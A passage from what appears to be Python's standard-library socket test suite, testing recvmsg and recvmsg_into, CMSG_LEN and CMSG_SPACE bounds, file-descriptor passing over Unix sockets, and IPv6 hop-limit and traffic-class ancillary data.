@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
